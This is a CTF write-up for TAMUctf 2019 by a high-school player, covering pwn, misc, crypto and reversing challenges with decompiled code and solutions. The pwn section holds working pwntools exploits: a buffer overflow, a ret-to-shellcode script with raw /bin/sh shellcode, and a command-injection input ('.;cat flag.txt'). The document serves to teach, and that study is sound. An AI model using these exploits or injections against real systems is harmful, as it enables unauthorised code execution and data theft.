반응형
write up by M4ndU (Team WH0a, high school)
Poor English. Sorry.
Pwn
Pwn1
355
nc pwn.tamuctf.com 4321
Difficulty: easy
32bit elf
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [sp+1h] [bp-3Bh]@1 int v5; // [sp+2Ch] [bp-10h]@1 int v6; // [sp+30h] [bp-Ch]@1 int *v7; // [sp+38h] [bp-4h]@1 v7 = &argc; setvbuf(stdout, (char *)2, 0, 0); v6 = 2; v5 = 0; puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see."); puts("What... is your name?"); fgets(&s, 43, stdin); if ( strcmp(&s, "Sir Lancelot of Camelot\n") ) { puts("I don't know that! Auuuuuuuugh!"); exit(0); } puts("What... is your quest?"); fgets(&s, 43, stdin); if ( strcmp(&s, "To seek the Holy Grail.\n") ) { puts("I don't know that! Auuuuuuuugh!"); exit(0); } puts("What... is my secret?"); gets(&s); if ( v5 == 0xDEA110C8 ) print_flag(); else puts("I don't know that! Auuuuuuuugh!"); return 0; } | cs |
If value of v5 is equal to 0xDEA110C8, we can get a flag.
Using bof vuln at Line 28 to override v5.
s is at ebp - 0x3B.
v5 is at ebp - 0x10.
offset 43bytes
payload = dummy[43] + v5[4]
exploit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | from pwn import * p = remote("pwn.tamuctf.com", 4321) v5 = 0xDEA110C8 payload = "A"*43 payload += p32(v5) p.recvline() p.recvline() p.sendline("Sir Lancelot of Camelot") p.recvline() p.sendline("To seek the Holy Grail.") p.recvline() p.sendline(payload) p.interactive() | cs |
flag : gigem{34sy_CC428ECD75A0D392}
Pwn3
454
nc pwn.tamuctf.com 4323
Difficulty: easy
32bit elf
1 2 3 4 5 6 7 | [*] '/home/mandu/pwn3' Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments | cs |
no NX, but PIE enabled.
1 2 3 4 5 6 7 | char *echo() { char s; // [sp+Eh] [bp-12Ah]@1 printf("Take this, you might need it on your journey %p!\n", &s); return gets(&s); } | cs |
stack leak and bof vuln.
payload = dummy[0x12A+4] + &shellcode[4] + NOP[40] + shellcode[25]
dummy 자리에 nop+shellcode를 넣어봤었는데 잘 안되서 그냥 리턴주소 이후로 빼놨더니 되었습니다.
exploit.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | from pwn import * p = remote("pwn.tamuctf.com", 4323) shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" p.recvuntil('ney ') buffer = int(p.recvuntil('!')[:-1], 16) #leak payload = "A"*(0x12a+4) #dummy payload += p32(buffer+0x12a+20) #ret payload += "\x90"* 40 #NOP payload += shellcode p.sendline(payload) p.interactive() | cs |
flag: gigem{r3m073_fl46_3x3cu710n}
Pwn4
356
nc pwn.tamuctf.com 4324
Difficulty: medium
32bit elf
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | int laas() { int result; // eax@2 char s; // [sp+7h] [bp-21h]@1 puts("ls as a service (laas)(Copyright pending)"); puts("Enter the arguments you would like to pass to ls:"); gets(&s); if ( strchr(&s, '/') ) result = puts("No slashes allowed"); else result = run_cmd((int)&s); return result; } | cs |
1 2 3 4 5 6 7 8 | int __cdecl run_cmd(int a1) { char s; // [sp+2h] [bp-26h]@1 snprintf(&s, 0x1Bu, "ls %s", a1); printf("Result of %s:\n", &s); return system(&s); } | cs |
no filtering ";".
So, You can use more than one command with ";".
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.
Result of ls .:
flag.txt
pwn4
ls as a service (laas)(Copyright pending)
Enter the arguments you would like to pass to ls:
.;cat flag.txt
Result of ls .;cat flag.txt:
flag.txt
pwn4
gigem{5y573m_0v3rfl0w}
flag : gigem{5y573m_0v3rfl0w}
EZ
MISC
Howdy!
mic check
flag : gigem{H0wdy!}
Who am I?
100
What is the A record for tamuctf.com?
(Not in standard gigem{flag} format)
Difficulty: easy
I used 'ping' command to find out A record for tmuctf.com
[MS cmd]
>ping tamuctf.com
Ping tamuctf.com [52.33.57.247] 32바이트 데이터 사용:
flag : 52.33.57.247
Who do I trust?
100
Who issued the certificate to tamuctf.com?
(Not in standard gigem{flag} format)
Difficulty: easy
ssl checker
https://www.sslshopper.com/ssl-checker.html#hostname=tamuctf.com
I could get ssl issuer
flag : Let's Encrypt Authority X3
Where am I?
100
What is the name of the city where the server for tamuctf.com is located?
(Not in standard gigem{flag} format)
Difficulty: easy
52.33.57.247
flag : Boardman
I heard you like files.
428
Bender B. Rodriguez was caught with a flash drive with only a single file on it. We think it may contain valuable information. His area of research is PDF files, so it's strange that this file is a PNG.
Difficulty: easy-medium
There is end signature of PNG at 0x340232
base64 encoded string, and PDF file.
I tried decoding base64 string,
Nice try, but there is no flag here.
You should check this music video out though, it's pretty cool.
https://www.youtube.com/watch?v=TuJqUvBj4rE
but it was not a flag..
Then, I exported part of pdf data.
I opened it.
i found another png file.
Open it with hex viewer.
pdf file again
found base64 string
flag : flag{P0lYt@r_D0_y0u_G3t_It_N0w?}
MicroServices
0_intrusion
100
Welcome to MicroServices inc, where do all things micro and service oriented!
Recently we got an alert saying there was suspicious traffic on one of our web servers. Can you help us out?
- What is the IP Address of the attacker?
open with wireshark.
packets 을 length order로 보면 10.91.9.93 sent many tcp packets to server.
so attacker's ip is 10.91.9.93
flag : 10.91.9.93
Crypto
-.-
244
To 1337-H4X0R:
Our coworker Bob loves a good classical cipher. Unfortunately, he also loves to send everything encrypted with these ciphers. Can you go ahead and decrypt this for me?
Difficulty: easy
dah-dah-dah-dah-dah dah-di-di-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dit dah-di-di-di-dit dah-di-dit di-di-di-di-dah dah-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dah-dah di-dah dah-dah-di-di-dit di-di-di-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit di-dah di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dah-dah di-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah dah-di-di-di-dit di-di-di-di-dah di-dah dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-dah dah-di-di-di-dit dah-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dit di-di-di-di-dah dit di-di-di-dah-dah dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit di-di-dah-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dit di-dah di-di-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-dah di-di-di-di-dah dah-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dah-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-di-di-di-dit dah-di-dah-dit di-di-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dah di-di-di-di-dah dah-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit dah-di-dit dah-dah-di-di-dit dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-di-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-di-di-dit di-di-dah-dah-dah dah-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dit di-di-di-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-dah-dah di-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dah dah-dah-dah-dah-dit di-di-di-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-dit di-di-dah-dah-dah dah-dah-dah-dah-dah dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-dah di-di-di-di-dah dah-di-di-dit di-di-di-di-dit di-dah dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit di-di-dah-dit dah-di-di-di-dit dah-di-dit dah-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah dah-di-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit dah-di-di-di-dit dah-di-dit di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dah dah-di-di-di-dit dah-di-di-di-dit dit di-di-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah dah-dah-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-dah di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-di-dit dah-dah-dah-di-dit di-di-dah-dah-dah dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-di-dit dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dah dah-dah-di-di-dit dah-di-di-di-dit dit di-di-dah-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dah dah-dah-di-di-dit di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-di-dit dah-di-di-di-dit di-di-dah-dah-dah di-dah-dah-dah-dah dah-di-di-di-dit di-dah di-di-dah-dah-dah di-dah-dah-dah-dah dah-dah-di-di-dit dah-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-di-dit di-di-di-di-dah di-di-dah-dah-dah dah-di-di-di-dit di-dah dah-di-di-di-dit di-di-di-di-dah di-di-di-di-dah dit di-di-di-di-dah dah-dah-dah-dah-dit dah-dah-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit dah-dah-di-di-dit di-di-dah-dah-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-di-dah di-di-dah-dah-dah di-di-di-di-dit di-di-di-di-dit dah-di-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-di-dit di-di-di-di-dit di-di-di-di-dit di-dah di-di-di-di-dah di-di-dah-dit di-di-di-di-dit dah-dah-dah-dah-dit di-di-di-di-dit di-dah di-di-di-dah-dah di-di-dah-dah-dah dah-dah-di-di-dit di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-di-di-dit di-di-di-di-dah di-di-di-dah-dah di-di-dah-dah-dah di-di-di-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-di-dah-dah dah-dah-di-di-dit di-di-dah-dah-dah dah-di-di-di-dit dah-dah-di-di-dit dah-dah-dah-di-dit di-di-di-di-dah dah-di-dah-dit di-di-di-di-dah dah-dah-dah-dah-dah di-di-di-di-dit dah-dah-di-di-dit di-di-di-di-dah di-di-dah-dit di-di-di-dah-dah dah-dah-di-di-dit di-di-di-dah-dah di-di-di-di-dah di-di-di-dah-dah di-dah-dah-dah-dah di-di-di-dah-dah dah-dah-dah-dah-dah di-di-di-di-dit di-dah-dah-dah-dah di-di-di-di-dah dah-dah-dah-dah-dit
4 or 5 개로 이루어져 있는 것으로 보아, they are must be morse code. The title of this task is also - . -
replace
dah ------> _
di , dit ---> .
- to ------>
and decode it!
0X57702A6C58744751386538716E6D4D59552A737646486B6A49742A5251264A705A766A6D2125254B446B6670235E4E39666B346455346C423372546F5430505A516D4351454B5942345A4D762A21466B386C25626A716C504D6649476D612525467A4720676967656D7B433169634B5F636C31434B2D7930755F683476335F6D3449317D20757634767A4B5A7434796F6D694453684C6D385145466E5574774A404E754F59665826387540476E213125547176305663527A56216A217675757038426A644E49714535772324255634555A4F595A327A37543235743726784C40574F373431305149
oh it's hex value.
hex to string https://codebeautify.org/hex-string-converter
Wp*lXtGQ8e8qnmMYU*svFHkjIt*RQ&JpZvjm!%%KDkfp#^N9fk4dU4lB3rToT0PZQmCQEKYB4ZMv*!Fk8l%bjqlPMfIGma%%FzG gigem{C1icK_cl1CK-y0u_h4v3_m4I1} uv4vzKZt4yomiDShLm8QEFnUtwJ@NuOYfX&8u@Gn!1%Tqv0VcRzV!j!vuup8BjdNIqE5w#$%V4UZOYZ2z7T25t7&xL@WO7410QI
flag : gigem{C1icK_cl1CK-y0u_h4v3_m4I1}
Reversing
Cheesy
100
Where will you find the flag?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 | int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx@1 __int64 v4; // rdx@1 __int64 v5; // rdx@1 __int64 v6; // rdx@1 __int64 v7; // rdx@1 __int64 v8; // rdx@1 int result; // eax@1 __int64 v10; // rcx@1 char v11; // [sp+Fh] [bp-41h]@1 char v12; // [sp+10h] [bp-40h]@1 __int64 v13; // [sp+38h] [bp-18h]@1 v13 = *MK_FP(__FS__, 40LL); std::operator<<<std::char_traits<char>>(&std::cout, "QUFBQUFBQUFBQUFBQUFBQQ==\n", envp); std::operator<<<std::char_traits<char>>(&std::cout, "Hello! I bet you are looking for the flag..\n", v3); std::operator<<<std::char_traits<char>>( &std::cout, "I really like basic encoding.. can you tell what kind I used??\n", v4); std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v5); std::operator<<<std::char_traits<char>>(&std::cout, "Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=\n", v6); std::operator<<<std::char_traits<char>>(&std::cout, "RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn\n", v7); std::allocator<char>::allocator(&v11); std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string( &v12, "Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==\n", &v11); std::allocator<char>::~allocator(&v11); std::operator<<<std::char_traits<char>>(&std::cout, "WW91IGp1c3QgbWlzc2VkIHRoZSBmbGFn\n", v8); std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string(&v12); result = 0; v10 = *MK_FP(__FS__, 40LL) ^ v13; return result; } | cs |
Decode a string which is at 28.
flag : gigem{3a5y_R3v3r51N6!}
Snakes over cheese
191
What kind of file is this?
decomplie .pyc file https://python-decompiler.com/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | from datetime import datetime Fqaa = [102, 108, 97, 103, 123, 100, 101, 99, 111, 109, 112, 105, 108, 101, 125] XidT = [83, 117, 112, 101, 114, 83, 101, 99, 114, 101, 116, 75, 101, 121] def main(): print 'Clock.exe' input = raw_input('>: ').strip() kUIl = '' for i in XidT: kUIl += chr(i) if input == kUIl: alYe = '' for i in Fqaa: alYe += chr(i) print alYe else: print datetime.now() if __name__ == '__main__': main() |
Good
I thought alYe is a flag, because this program prints alYe when the value of input is equal to kUIl.
Convert Fqaa to ascii
flag : flag{decompile}
반응형
'CTF Write Up' 카테고리의 다른 글
| 제17회 YISF 2019 예선 write-up (0) | 2019.08.14 |
|---|---|
| CODEGATE 코드게이트 2019 뉴비 해킹대회 OPEN CTF & 부스 문제풀이 Write up 롸업 (0) | 2019.03.28 |
| 제 1회 TRUST CTF write up (0) | 2019.02.18 |
| NeverLAN CTF 2019 write up (0) | 2019.02.04 |
| 2019 NEWSECU CTF Write-Up (0) | 2019.02.04 |